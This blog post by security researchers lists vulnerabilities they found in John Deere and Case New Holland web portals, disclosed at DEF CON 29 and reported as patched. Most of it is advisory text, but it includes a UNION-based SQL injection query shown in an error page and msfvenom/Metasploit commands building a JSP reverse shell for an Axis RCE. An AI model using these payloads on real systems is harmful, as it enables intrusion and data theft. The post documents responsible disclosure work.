Over the weekend, we presented an undertaking by a group of researchers that decided to “just have a look” at how Agriculture companies are implementing “Tech” in their respective industries.
We presented research, also known as “ethical hacking”, which was done for free over the course of 6 months.
During that time we met dozens of unique people, some deep within the industry, who provided amazing insight into what we would expect while doing this research. Any they know who they are! We even met some who have worked at John Deere, etc., as well as other or related industries, such as partners or competitors in the space.
All in all, they had some very interesting observations and, while not directly participated in, many were able to point us in directions that might be, “vulnerable to a cyber attack”. While often looked over, security within Food & Agriculture is one of the most important pieces of global supply chain security.
And so we “audited” some agriculture companies in the industry, and present to you the most relevant or interesting vulnerabilities we found. Some boring, development domain or zero-impact vulnerabilities have been omitted.
Below you will find ALL the vulnerabilities we found in these two companies, plus some which did not make it into the DEF CON talk at the time of recording. I have displayed all of the advisories we presented at DEF CON 29 and also the each vendor: John Deere and Case Industrial directly. All of these are patched (from public networks) and with the fantastic assistance of ICS CERT, we were able to assist these companies in fixing their systems. I encourage anyone who discovers major or even minor vulnerabilities, and has trouble contacting legacy companies, or emerging tech, to reach out ICS CERT, as they are extremely agile and responsive to potential national security issues: https://us-cert.cisa.gov/ics
And here are all the vulnerabilities (in chronological order of discovery)!
SICK-2021-038 John Deere Account Portal – DOM Based XSS in forgetUser?TARGET=
Cross-site Scripting (XSS) vulnerability in reset password function of John Deere John Deere Account Portal allows a remote unauthenticated attacker to execute DOM based XSS attacks via the forgetUser?TARGET= argument.
SICK-2021-039 John Deere Account Portal – DOM Based XSS in forgetUser?TARGET=
Cross-site Scripting (XSS) vulnerability in registration function of John Deere John Deere Account Portal allows a remote unauthenticated attacker to execute DOM based XSS attacks via the registration?SRC= argument.
SICK-2021-040 John Deere Account Portal – DOM Based XSS in com.deere.u90950.webregistration.view.servlets.StandardRegistrationAddServlet?EM_MandatoryPhone=
Cross-site Scripting (XSS) vulnerability in registration function of John Deere John Deere Account Portal allows a remote unauthenticated attacker to execute DOM based XSS attacks via the com.deere.u90950.webregistration.view.servlets.StandardRegistrationAddServlet?EM_MandatoryPhone= argument.
SICK-2021-041 John Deere Account Portal – DOM Based XSS’s in https://registration.deere.com
Cross-site Scripting (XSS) vulnerability in registration function of John Deere John Deere Account Portal allows a remote unauthenticated attacker to execute DOM based XSS attacks via the SignInServlet page.
SICK-2021-042 John Deere HTTP Request Smuggling vulnerabilities in qual.contest.deere.com, adds-eu.deere.com, admin.qual.contest.deere.com
An HTTP request smuggling vulnerability in John Deere qual.contest.deere.com, adds-eu.deere.com, admin.qual.contest.deere.com subdomains allows a remote unauthenticated attacker to bypass front-end security controls.
SICK-2021-043 John Deere PEGA Service kms.deere.com affected by CVE-2021-27653
John Deere default misconfiguration of the Pega Chat Access Group portal in Pega platform 7.4.0 – 8.5.x lead to unintended data exposure, allowing download of mission critical data.
Proof of Concept
SICK-2021-044 John Deere MachineBook for on-site demonstrations using company equipment publicly accessible and vulnerable to SQLi injection.
A vulnerability in John Deere MachineBook (internal-use only) administration panel, which was publicly accesible allowed SQLi injection which allows a remote unauthenticated attacker to log into the database containing employee data and machine data.
The GET parameter 'eqid' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
SICK-2021-045 unrelated to Deere
SICK-2021-046 John Deere Public Facing Axiom API Health Page. CWE-419: Unprotected Primary Channel
An Unprotected Primary Channel vulnerability in the John Deere https://apiqa.tal.deere.com/platform/health/all website allows a remote unauthenticated attacker to view mission critical health tests related too all *.deere.com assets.
SICK-2021-047 John Deere Supplier Invoice Improper Neutralization of Input During Web Page Generation (‘Cross-site Scripting’) in invoice.view.servlets.EmailLoginServlet & view.servlets.SelectPOServlet#
A DOM Based XSS vulnerability in the John Deere Supplier Invoice Login Servlet & John Deere Supplier Invoice Purchase Order Servlet pages allow a remote unauthenticated attacker to execute DOM based XSS attacks via the Supplier Invoice portal.
An SQLi injection vulnerability vulnerability in the John Deere Supplier Invoice Purchase Order Servlet pages allow a remote unauthenticated attacker to perform SQLi injection on the (Purchase Order) form field which returns a response containing the executed IBM DB2 SQL query.
We're sorry, there was an application error.
Please contact the Help Desk by phone or email with the Diagnostic Information below.
You may want to print this page as it has important information about the error.
Go back to the page I was viewing
Server Time 2021-04-29 00:56:59.676
Application Name e-Invoice
Application URL /invoice/servlet/com.deere.u90242.invoice.view.servlets.SelectPOServlet
Error Message Offending query is: SELECT COUNT(PO_NUM) TOTAL FROM (SELECT DISTINCT PO_NUM FROM DJDBP01.PURCH_HRZN_PO_DTL WHERE PO_NUM = '1') UNION SELECT * FROM DJDBP01.SM_IND_ORD_HDR --' UNION ALL SELECT DISTINCT PO_NUM FROM DJDBP01.SM_IND_ORD_HDR WHERE PO_NUM = '1') UNION SELECT * FROM DJDBP01.SM_IND_ORD_HDR --' )
Nobody in our team knows how to use IBM DB2 which was initially released in 1983
SICK-2021-049 John Deere Supplier supportportaldevr14.deere.com/axis Affected by AXIS RCE CVE-2019-0227
A Remote Code Execution (RCE) Vulnerability in the John Deere Supplier supportportaldevr14.deere.com/axis as it was afflicted by AXIS RCE CVE-2019-0227
msfvenom -p java/jsp_shell_reverse_tcp LHOST=xxxx LPORT=xxxx -f raw -o rce-poc.jsp
set payload java/jsp_shell_reverse_tcp
set LHOST xxxx
set LPORT xxxx
SICK-2021-050 Case New Holland (CNH) exposed JavaMelody monitoring server of the Case New Holland (CNH) painel360.cnhindustrial.com.
An exposed JavaMelody monitoring server of the Case New Holland (CNH) painel360.cnhindustrial.com allows an unauthenticated remote attacker to view session data of all current website users including cookies for authentication, full name, HTML page contents of current viewing page, IP address, location, user ID number and session count. An attacker can login as any user that is using the website.
SICK-2021-051 Case New Holland (CNH) Azure username enumeration vulnerability euapidevportpwbapp02.azurewebsites.net/api/auth?email= and first name & last name lookup.
A username enumeration vulnerability in the Case New Holland (CNH) Azure username API https://euapidevportpwbapp02.azurewebsites.net/api/auth?email= allows an unauthenticated remote attacker to see the user id number, permission level, user roles, username, first name, and last name, exposing critical PII of any known user of the CNH portal.
SICK-2021-052 Case New Holland (CNH) Exposed Sidekiq Server 3.2.12 be-staging-nzqq.cnhindustrial.com/sidekiq
An exposed Sidekiq server containing Case New Holland (CNH) running Sidekiq version 3.2.12 storing data synchronization queues for cnhi-nz-rails-server & cnhi-nz-rails-server-uat allows an unauthenticated remote attacker to manipulate internal data queues.